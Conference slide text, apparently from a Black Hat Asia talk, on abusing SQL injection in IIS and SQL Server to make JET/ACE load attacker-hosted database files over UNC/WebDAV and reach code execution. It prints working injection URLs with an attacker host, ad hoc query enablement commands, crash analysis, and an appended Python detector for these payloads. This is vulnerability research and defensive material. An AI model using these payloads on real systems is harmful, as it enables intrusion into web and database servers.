SQL Injection IIS
#BHASIA @BLACKHATEVENTS
Agenda
• Who are we
• Introduction: motivation and background
• A new remote attack surface in IIS and SQL Server
• Three attack scenarios
• Attack IIS with a SQL injection in Access database - demo
• Attack SQL Server with a SQL injection in SQL Server database - demo
• Attack IIS with a web shell [bonus] - demo
• Summary
Who Are We
• We are security researchers from Palo Alto Networks
• Tao Yan (@Ga1ois)
• Qi Deng
• Bo Qu
• Regular conference presenters
• Black Hat, CanSecWest, Blue Hat, Recon, POC, HITCON, etc.
• Regular top vulnerability contributors for Microsoft, Adobe, Apple, etc.
• Several times in MSRC TOP 10 Researchers
Motivation and background
• Is there any new attack surface in IIS and SQL Server?
• Can SQL injection only be used to view data in the database?
• What is Microsoft JET database engine and who can use it?
Motivation and background
• Attack surfaces in IIS and SQL Server are very limited.
Motivation and background
• What is SQL Injection?
• Execute unintended SQL queries in the target database.
• What did we previously know SQL injection could do?
• View data in the database.
• What did we previously know SQL injection could NOT do?
• Execute native code in the web application or database process.
• Execute shell commands or read/write arbitrary files without high privileges in the specific database (e.g. xp_cmdshell requires sa/sysadmin in SQL Server).
Motivation and background
• Microsoft JET database engine
• ~30 years old and not well maintained, but still massively used.
• Natively supported on all Windows versions.
Who can use Microsoft JET database engine?
• Office is not an ideal target.
• Neither is wscript.exe.
Motivation and background
• What if we combine these three topics?
• Is it possible to use vulnerabilities in the JET database engine to attack IIS and SQL Server: use a SQL injection to execute arbitrary SQL queries against a remote, attacker-controlled database, and thereby get native code execution in the IIS or SQL Server process?
Cross Database SQL Query in Access and SQL Server
Access
SELECT * FROM [ExternalDatabase].[table]
SQL Server
SELECT * FROM OPENDATASOURCE('provider', 'data source=ExternalDatabase')...[table]
EXEC sp_addlinkedserver
    @server = 'ServerName',
    @srvproduct = 'ServerProduct',
    @provider = 'provider',
    @datasrc = 'ExternalDatabase',
    @provstr = 'ProviderString';
External database and provider
• The external database can be a different database type, such as a JET database.
• Access uses the JET provider by default: msjet40.dll
Call chain from the cross-database query down to the file open (caller first; the UNC path ends up in CreateFileW):
msjet40!ErrOpenDatabase / msjet40!ErrOpenForeignDatabase
Coml2!StgOpenStorage
Coml2!DfOpenDocFile
Coml2!DfFromName
Coml2!CFileStream::InitWorker
Coml2!CFileStream::Init_OpenOrCreate
kernel32!CreateFileW (UNC path)
UNC path parsing in acecore (msjet 12.0)
The hidden feature for CreateFile(UNC) in IIS and SQL Server
Asp code
const strDBPath = "database/#data.mdb"
set conn = server.createobject("adodb.connection")
conn.open "DRIVER={Microsoft Access Driver (*.mdb)};DBQ=" & server.mappath(strDBPath) & ";pwd="
id = request("id")
sql = "select * from product where id=" & id
set rs = conn.execute(sql)
Injected parameter:
id=1513 and (SELECT [fc4] FROM [Excel 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])
Resulting query:
sql = select * from product where id=1513 and (SELECT [fc4] FROM [Excel 8.0;Database=\\10.2.156.63/webdav/poc237.xls].[ft8])
Cross database query call stack in IIS + ASP + Access (innermost frames first)
odbc32 + odbcjt32
msado15 + msdasql
vbscript
asp
SQL Injection in SQL Server with cross database query
Asp code
set conn = server.createobject("adodb.connection")
conn.open "provider=sqloledb;data source=DESKTOP-32BIT\SQLEXPRESS;uid=test;pwd=123456;database=testdb"
id = request("id")
sql = "select * from persons where personid=" & id
set rs = conn.execute(sql)
Injected parameter:
id=1;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;
Msjet 4.0 cross database query call stack in SQL Server (innermost frames first)
msjetoledb40
oledb32
sqllang
sqldk
Msjet 12.0 Acecore cross database query call stack in SQL Server (innermost frames first)
Aceoledb + Acecore
oledb32
Sqllang + sqlmin
sqldk
A new remote attack surface on IIS and SQL Server
• The new attack surface
• The capability to execute any SQL query against any attacker-controlled database inside IIS and SQL Server, given a SQL injection.
• Fuzzing by mutating both the SQL queries and the JET database files.
• The JET code was developed and tested against well-formed database files only.
• It is a huge gold mine: we have found ~100 vulnerabilities here.
• Limitations
• Only SELECT queries are available through the Access (JET 4.0 via ODBC) path.
• Acecore (msjet 12.0) is not installed by default.
Scenario 1: IIS + Access
http://127.0.0.1/access_injection.asp?id=1513%20and%20(SELECT TOP 44 [ft4].[fc3] AS [c01] FROM [\\10.2.156.63/webdav/poc7c.mdb].[ft4] WHERE [ft4].[fc3] <> 2 GROUP BY [ft4].[fc3])
Scenario 1: IIS + Access, CVE-2021-XXXX
6a0e166a lea eax,[esi+34h] <-- esi is the TableMover object
6a0e166d je msrd3x40!TableMover::RecordAddress+0x59 (6a0e1679)
6a0e166f cmp dword ptr [esi+10h],0
6a0e1673 je msrd3x40!TableMover::RecordAddress+0x1f3 (6a0e1813)
6a0e1679 push eax
6a0e167a push dword ptr [esi+0Ch]
6a0e167d mov ecx,edi
6a0e167f call msrd3x40!DataPage::RecordAddress (6a0bb410) <-- esi+0x34 was set in it
6a0e1684 cmp eax,4 <-- eax=1 when 0x4800
6a0e1687 ja msrd3x40!TableMover::RecordAddress+0x148 (6a0e1768)
6a0e168d jmp dword ptr msrd3x40!TableMover::RecordAddress+0x288 (6a0e18a8)[eax*4]
6a0e1694 mov eax,dword ptr [esi+34h] <-- eax is from esi+0x34; jump case 1
6a0e1697 lea ebx,[esi+24h]
6a0e169a mov ecx,ebx
6a0e169c mov edi,dword ptr [eax] ds:002b:26de7000=????????
Scenario 1: IIS + Access, CVE-2021-XXXX
msrd3x40!TableMover object before DataPage::RecordAddress (esi = 0b7e4fb8):
0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02
0b7e4fc8 00000000 26dd2cd4 26de6800 00000001
0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0
0b7e4fe8 c0c0c0c0 00000000 00000000 00000000
0b7e4ff8 00000000
msrd3x40!TableMover object after DataPage::RecordAddress (esi+0x34 = 0b7e4fec now holds 26de7000):
0b7e4fb8 6a0a63cc 15302e90 00000000 0000ff02
0b7e4fc8 00000000 26dd2cd4 26de6800 00000001
0b7e4fd8 c0c0c0c0 00000000 00000000 c0c0c0c0
0b7e4fe8 c0c0c0c0 26de7000 00000000 00000000
0b7e4ff8 00000000
0:020:x86> !address 26de6800
Usage: <unknown>
Base Address: 00000000`26dd0000
End Address: 00000000`26de7000
0:020:x86> db 26de6800
26de6800 09 01 d6 07 14 00 00 00-10 00 00 c8 00 c8 00 48
26de6810 00 c8 00 c8 00 c8 00 c8-00 c8 00 c8 00 c8 00 c8
26de6820 00 c8 00 c8 00 c8 00 c8-00 c8 00 ff ff 00 00 00
26de6830 00 00 00 00 00 00 00 00-00 00 12 00 00 00 00 00
26de6840 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6850 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6860 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
26de6870 00 00 00 61 72 74 6c 61-72 2e 53 00 00 00 00 00
The data page at 26de6800 is the last 0x800 bytes of the region and 26de7000 is its end address, so the record address stored at esi+0x34 points one past the allocation and the read at 6a0e169c (mov edi,dword ptr [eax]) faults on unmapped memory.
How to find CVE-2021-XXXX
• SELECT TOP 44 [ft4].[fc3] AS [c01] FROM [\\10.2.156.63/webdav/poc7c.mdb].[ft4] WHERE [ft4].[fc3] <> 2 GROUP BY [ft4].[fc3]
• Power of database file mutations
(figure: original database file bytes vs. mutated database file bytes)
CVE-2021-XXXX Demo
Scenario 2: IIS + SQL Server
SQL Server 32-bit
• Target requirement: SQL injection; default setup
• Database privilege: public with ad hoc distributed queries enabled, or SA to enable ad hoc access to the remote database
• Vulnerable components: all JET components (msjet40, msrd3x40, msexcl40, acecore, etc.)
• Supported SQL in the injection: all SQL queries, multiple statements, action queries and cross-table queries
• Trigger: one single web request
• Security boundary crossed: from a SQL injection in SQL Server to SQL Server DoS, info leak or RCE as the MSSQLSERVER user in the sqlservr.exe process
SQL Server 64-bit
• Target requirement: SQL injection; Access Redistributable installed
• Database privilege: public with ad hoc distributed queries enabled, or SA to enable ad hoc access to the remote database
• Vulnerable components: acecore
• Supported SQL in the injection: all SQL queries, multiple statements, action queries and cross-table queries
• Trigger: one single web request
• Security boundary crossed: from a SQL injection in SQL Server to SQL Server DoS, info leak or RCE as the MSSQLSERVER user in the sqlservr.exe process
Scenario 2: IIS + SQL Server, CVE-2020-1711
http://127.0.0.1/mssql_injection.asp?id=1;exec%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;exec%20sp_configure%20%27Ad%20Hoc%20Distributed%20Queries%27,%201;RECONFIGURE;UPDATE%20opendatasource(%27Microsoft.ACE.OLEDB.12.0%27,%20%27data%20source=\\10.2.156.63\webdav\poc42cf.mdb%27)...[ft8]%20SET%20[fc3]%20=%20[fc3]%20%2b%2047774%20WHERE%20[fc3]%20%3C=%207%20OR%20[fc2]%20%3C=%205;
Decoded:
id=1;exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries', 1;RECONFIGURE;UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5;
The two sp_configure/RECONFIGURE statements need ALTER SETTINGS (sysadmin or serveradmin), which is the "SA to enable ad hoc" case of the table above; where Ad Hoc Distributed Queries is already enabled, the UPDATE alone is enough for a public login.
Scenario 2: IIS + SQL Server, CVE-2020-1711
Before overflow:
0:000> dc 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000 ...9...........
1ca2efe8 00000020 00000000 1ca2effc 00000004 ...............
1ca2eff8 00000000 00000000 00000000 00000000 ................
1ca2f008 00000000 00000000 00000000 00000000 ................
1ca2f018 00000000 00000000 00000003 feff0000 ................
1ca2f028 32312e30 34323133 38373635 31353637 0.12312456787651
1ca2f038 35333432 37353634 30feff32 3332312e 243546572..0.123
1ca2f048 35343231 37383736 32313536 34353334 1245678765124354
1ca2f058 32373536 31353433 33353433 33343632 6572345134532643
1ca2f068 2e002837 01000600 00000700 00000000 7(..............
After overflow:
0:000> dd 1ca2efd8
1ca2efd8 1ca2f020 00000039 00000fdc 1ca2f000
1ca2efe8 00000020 00000000 37a30afc 1b001b04
1ca2eff8 1b001b00 1b001b00 1b001b00 1b001b00
1ca2f008 1b001b00 1b001b00 1b001b00 1b001b00
1ca2f018 1b001b00 1b001b00 1b001b03 19ff1b00
1ca2f028 4d314931 4f324c33 53375135 4c355137
1ca2f038 50334f32 52355134 4bff1a32 4e324c2e
1ca2f048 50344d31 52385236 4d315036 4f354e34
1ca2f058 4d375036 4c354f33 4e354f33 4e345132
1ca2f068 49004337 01002100 00000700 00000000
0:000>
eax=1c9d1f38 ebx=1ca28e50 ecx=1c9b7800 edx=1c9b7800 esi=1ca2efd8 edi=028fda0c
eip=5bdd0ce9 esp=028fd974 ebp=028fd98c
ACECORE+0x20ce9:
5bdd0ce9 8b7810 mov edi,dword ptr [eax+10h] ds:002b:1c9d1f48=0000003e
0:000> dc 1c9d1f38
1c9d1f38 5bf0f5fc 1c9d1f78 00000006 00000003 ...[x...........
1c9d1f48 0000003e 00000004 00000003 00000409 >...............
1c9d1f58 00010000 c0c0c0c0 00000000 00000000 ................
1c9d1f68 1c9b7e40 1c9b7800 00000000 00000000 @~...x..........
1c9d1f78 00630066 00000033 c0c0c0c0 c0c0c0c0 f.c.3...........
How to find CVE-2020-1711
• UPDATE opendatasource('Microsoft.ACE.OLEDB.12.0', 'data source=\\10.2.156.63\webdav\poc42cf.mdb')...[ft8] SET [fc3] = [fc3] + 47774 WHERE [fc3] <= 7 OR [fc2] <= 5
• Power of mutations on the database file
(figure: mutated database file bytes vs. original database file bytes)
CVE-2020-1711 Demo
Scenario 3: IIS + Web Shell
0:000> dd 1ff46fd8
1ff46fd8 1ff47020 0000044e 00000fdc 1ff47000
1ff46fe8 00000020 00000000 1ff46ffc 00000004
1ff46ff8 00000000 00000001 0000001f 00000000
1ff47008 00000000 00000000 00000000 00000000
1ff47018 00000000 00000000 9c400006 00000000
1ff47028 000a0000 00000000 00000000 00000000
Scenario 3: IIS + Web Shell, CVE-2020-17062
memcpy((void *)(v5 + (*(_WORD *)(v5 + 2 * 0 + 14) & 0x3FFF)), 0x1ff47020, 0x44e);
• The destination offset is a 16-bit field read from the attacker's database page (v5 + 14) and is only masked with 0x3FFF, so the 0x44e-byte copy is not bounded to the page buffer.
• Heap grooming
• Execute multiple queries in one database connection
• Try/catch each query in the web shell
CVE-2020-17062 Demo
Vulnerabilities in three attack scenarios
• Old
• Present from Windows XP to Windows 10: over 20 years.
• Easy
• Weak or no mitigations: no CFG in msjet40.dll, msrd3x40.dll, 32-bit acecore, etc.
• Severe
• Remote code execution as DefaultAppPool (IIS) or MSSQLSERVER (SQL Server); both hold SeImpersonatePrivilege, so token kidnapping escalates to SYSTEM.
• Microsoft does NOT treat NETWORK SERVICE / LOCAL SERVICE to SYSTEM as a security boundary.
Summary
• Feature or vulnerability?
• The WebDAV (UNC path) feature opens a new world for attackers: given a SQL injection, attacking IIS and SQL Server remotely becomes as easy as attacking the Microsoft JET database engine locally. A great number of new vulnerabilities were found in the JET database engine and can be used to attack IIS and SQL Server.
• Backwards compatibility is bad.
• All Windows systems released in the last decades, including WIP (Windows Insider Preview), remain compatible with the ~30-year-old Microsoft JET database engine.
• Defense and mitigation
• Pay more attention to WebDAV: outbound UNC/WebDAV access from the IIS and SQL Server hosts is what delivers the attacker's database file.
• Keep "Ad Hoc Distributed Queries" disabled and do not give the web application a SQL login that can change server settings (see the privilege column in the Scenario 2 table).
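The following Python is an added triage example, not code from the talk, from Palo Alto Networks or from Microsoft. It recognises the cross-database query forms shown on the earlier slides (bracketed [\\host\share\file.mdb].[table] and [Excel 8.0;Database=...].[table] references in Access syntax, OPENDATASOURCE/OPENROWSET and sp_addlinkedserver in SQL Server syntax, and the sp_configure 'Ad Hoc Distributed Queries' enabling step), URL-decodes the cs-uri-query field of IIS W3C log lines the way ASP's Request() does before the value reaches the SQL string, and reports which requests carried a remote (UNC) database reference. The log lines, client IPs and timestamps are constructed; the payloads, hosts and file names are the slides' own. The Finding class, the regex names and the function names are this example's, not anything the talk or IIS provides.

```python
r"""Triage cross-database query injections of the kind shown on these slides.

Added example (not from the talk): URL-decode the cs-uri-query of IIS W3C log
lines and flag the markers that turn a SQL injection into a remote JET file load:
  Access/JET   [\\host\share\db.mdb].[table]   [Excel 8.0;Database=\\...].[table]
  SQL Server   OPENDATASOURCE/OPENROWSET('provider', 'data source=\\...')...[table]
               EXEC sp_addlinkedserver ... @datasrc='...'
  enabling     sp_configure 'Ad Hoc Distributed Queries', 1
"""
import re
from dataclasses import dataclass
from urllib.parse import unquote_plus

UNC_RE = re.compile(r"\\\\[\w.\-]+[\\/]")  # \\host\ or \\host/ (JET accepts both)
# [spec].[table] where spec is a bare \\path or "Provider;Database=path"
ACCESS_EXT_RE = re.compile(r"\[(?P<spec>[^\[\]]*?(?:\\\\|database=)[^\[\]]*)\]\s*\.\s*\[", re.I)
OPENDS_RE = re.compile(
    r"open(?:datasource|rowset)\s*\(\s*N?'(?P<prov>[^']*)'\s*,\s*N?'(?P<conn>[^']*)'", re.I)
LINKED_RE = re.compile(r"sp_addlinkedserver\b(?P<args>[^;]*)", re.I)
ADHOC_RE = re.compile(r"sp_configure\s+N?'ad hoc distributed queries'\s*,\s*1\b", re.I)


@dataclass(frozen=True)
class Finding:
    kind: str       # access-external | opendatasource | linked-server | enable-adhoc
    provider: str   # "Excel 8.0", "Microsoft.ACE.OLEDB.12.0", ... ("" = JET default)
    source: str     # database path / data source exactly as written in the query
    remote: bool    # True for a UNC path, i.e. a file the attacker can host (SMB/WebDAV)


def _data_source(conn: str) -> str:
    """Pull the file path out of 'data source=...', 'DBQ=...' or 'Database=...'."""
    m = re.search(r"(?:data source|dbq|database)\s*=\s*([^;]+)", conn, re.I)
    return m.group(1).strip() if m else conn.strip()


def _named_arg(name: str, args: str) -> str:
    m = re.search(name + r"\s*=\s*N?'([^']*)'", args, re.I)
    return m.group(1) if m else ""


def analyze_sql(sql: str) -> list[Finding]:
    """All external-database references (and ad-hoc enablement) in one decoded SQL string."""
    out: list[Finding] = []
    for m in ACCESS_EXT_RE.finditer(sql):             # Access/JET: [spec].[table]
        spec = m.group("spec")
        prov, _, db = spec.partition(";")              # "Excel 8.0;Database=..." or bare path
        if not db:
            prov, db = "", spec                        # bare path -> default JET provider
        db = _data_source(db)
        out.append(Finding("access-external", prov.strip(), db, bool(UNC_RE.match(db))))
    for m in OPENDS_RE.finditer(sql):                 # SQL Server: OPENDATASOURCE / OPENROWSET
        ds = _data_source(m.group("conn"))
        out.append(Finding("opendatasource", m.group("prov"), ds, bool(UNC_RE.match(ds))))
    for m in LINKED_RE.finditer(sql):                 # SQL Server: sp_addlinkedserver
        ds = _named_arg("@datasrc", m.group("args"))
        if ds:
            out.append(Finding("linked-server", _named_arg("@provider", m.group("args")),
                               ds, bool(UNC_RE.match(ds))))
    if ADHOC_RE.search(sql):                          # must succeed before OPENDATASOURCE works
        out.append(Finding("enable-adhoc", "", "Ad Hoc Distributed Queries", False))
    return out


def parse_w3c(log: str) -> list[dict]:
    """Minimal IIS W3C extended log reader; column names come from the #Fields: header."""
    fields, rows = [], []
    for line in log.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def triage_log(log: str) -> list[tuple[str, str, list[Finding]]]:
    """(client ip, uri-stem, findings) for each request whose decoded query carries a marker."""
    hits = []
    for row in parse_w3c(log):
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        findings = analyze_sql(unquote_plus(query))   # ASP's Request() hands the app the decoded value
        if findings:
            hits.append((row["c-ip"], row["cs-uri-stem"], findings))
    return hits


# Constructed log: one benign request, then the Scenario 1 and Scenario 2 payloads from the slides.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-05-06 09:00:00 127.0.0.1 GET /access_injection.asp id=1513 80 - 10.2.156.10 Mozilla/5.0 - 200 0 0 12
2021-05-06 09:00:05 127.0.0.1 GET /access_injection.asp id=1513%20and%20(SELECT%20TOP%2044%20[ft4].[fc3]%20AS%20[c01]%20FROM%20[\\10.2.156.63/webdav/poc7c.mdb].[ft4]%20WHERE%20[ft4].[fc3]%20%3C%3E%202%20GROUP%20BY%20[ft4].[fc3]) 80 - 10.2.156.63 Mozilla/5.0 - 500 0 0 31
2021-05-06 09:00:09 127.0.0.1 GET /mssql_injection.asp id=1;exec%20sp_configure%20%27show%20advanced%20options%27,%201;RECONFIGURE;exec%20sp_configure%20%27Ad%20Hoc%20Distributed%20Queries%27,%201;RECONFIGURE;UPDATE%20opendatasource(%27Microsoft.ACE.OLEDB.12.0%27,%20%27data%20source=\\10.2.156.63\webdav\poc42cf.mdb%27)...[ft8]%20SET%20[fc3]%20=%20[fc3]%20%2b%2047774%20WHERE%20[fc3]%20%3C=%207%20OR%20[fc2]%20%3C=%205; 80 - 10.2.156.63 Mozilla/5.0 - 500 0 0 44
"""

if __name__ == "__main__":
    for ip, stem, findings in triage_log(SAMPLE_LOG):
        for f in findings:
            print(f"{ip} {stem} {f.kind:16} provider={f.provider!r} source={f.source!r} remote={f.remote}")
```

Run as a script it prints the two flagged requests: the Access payload as a default-provider JET reference to a remote .mdb, and the T-SQL payload as an ACE OPENDATASOURCE against a remote .mdb preceded by the ad hoc enablement. A remote=True finding is the signal that matters for this attack surface, since it means the server process opened a database file the requester controls. The check is a detection aid only; it does not replace parameterising the query, keeping Ad Hoc Distributed Queries off, or blocking outbound SMB/WebDAV from the IIS and SQL Server hosts.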
One more thing
• Security boundary
• JET vulnerabilities make "SQL query execution (on a controllable JET database)" equivalent to "native code execution".
• remote attack surface
• SQL query execution (on controllable JET database) in IIS/SQL Server = native code
execution in IIS/SQL Server
• from SQL Injection to remote SYSTEM.
• local attack surface
• ???
Acknowledgement
• Thanks to Zhibin Zhang
Q&A